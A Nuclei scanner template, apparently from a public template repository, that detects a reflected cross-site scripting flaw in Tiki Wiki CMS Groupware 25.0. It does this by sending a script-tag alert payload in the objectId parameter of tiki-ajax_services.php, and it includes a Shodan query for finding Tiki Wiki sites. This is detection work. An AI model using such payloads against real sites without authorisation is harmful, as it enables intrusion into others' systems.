nuclei-templates/vulnerabilities/other/tikiwiki-xss.yaml

35 lines
1.0 KiB
YAML
Raw Normal View History

2023-01-22 19:28:22 +00:00
id: tikiwiki-xss
info:
name: Tiki Wiki CMS Groupware v25.0 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
2023-01-23 04:50:26 +00:00
Tiki Wiki CMS Groupware version 25.0 suffers from a cross site scripting vulnerability.
reference:
2023-01-22 19:28:22 +00:00
- https://packetstormsecurity.com/files/170446/Tiki-Wiki-CMS-Groupware-25.0-Cross-Site-Scripting.html
metadata:
shodan-query: http.html:"tiki wiki"
verified: "true"
2023-01-23 04:50:26 +00:00
tags: acketstorm,edb,xss,tikiwiki
2023-01-22 19:28:22 +00:00
requests:
2023-01-23 04:50:26 +00:00
- method: GET
path:
- "{{BaseURL}}/tiki/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=<script>alert(document.domain)</script>"
- "{{BaseURL}}/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=<script>alert(document.domain)</script>"
2023-01-22 19:28:22 +00:00
2023-01-23 04:51:13 +00:00
stop-at-first-match: true
2023-01-22 19:28:22 +00:00
matchers-condition: and
matchers:
2023-01-23 04:50:26 +00:00
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'Tiki Wiki CMS'
condition: and
2023-01-22 19:28:22 +00:00
- type: status
status:
- 403